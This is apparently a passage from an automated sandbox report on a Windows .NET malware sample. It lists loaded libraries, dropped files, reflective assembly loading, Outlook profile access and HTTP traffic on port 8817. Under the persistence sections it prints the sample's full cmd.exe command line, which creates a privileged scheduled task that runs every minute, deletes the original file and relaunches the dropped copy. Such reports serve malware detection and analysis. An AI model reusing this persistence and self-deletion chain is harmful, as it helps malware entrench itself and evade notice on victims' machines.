                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: httpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\manager.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                      Source: Window Recorder  Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0LpFv1haTA.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 0LpFv1haTA.exe  Static file information: File size 9593944 > 1048576
                      Source: 0LpFv1haTA.exe  Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr

                      Data Obfuscation

                      Source: manager.exe.7.dr, DllHandler.cs  .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                      Source: manager.exe.7.dr, DllHandler.cs  .Net Code: DllNodeHandler
                      Source: manager.exe.41.dr, DllHandler.cs  .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                      Source: manager.exe.41.dr, DllHandler.cs  .Net Code: DllNodeHandler
                      Source: 0LpFv1haTA.exe  Static PE information: 0xC879E997 [Fri Jul 31 14:54:15 2076 UTC]
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Code function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Code function: 7_2_00007FF848F100BD pushad ; iretd 7_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Code function: 13_2_00007FF848F100BD pushad ; iretd 13_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Code function: 40_2_00007FF848F200BD pushad ; iretd 40_2_00007FF848F200C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Code function: 46_2_00007FF848F300BD pushad ; iretd 46_2_00007FF848F300C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Code function: 47_2_00007FF848F100BD pushad ; iretd 47_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Code function: 48_2_00007FF848F100BD pushad ; iretd 48_2_00007FF848F100C1
                      Source: C:\Users\user\AppData\Roaming\manager.exe  File created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  File created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  File created: C:\Users\user\AppData\Roaming\manager.exe

                      Boot Survival

                      Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
                      Source: unknown  Network traffic detected: HTTP traffic on port 49739 -> 8817
                      Source: unknown  Network traffic detected: HTTP traffic on port 8817 -> 49739
                      Source: unknown  Network traffic detected: HTTP traffic on port 8817 -> 49739
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess information set: NOOPENFILEERRORBOX
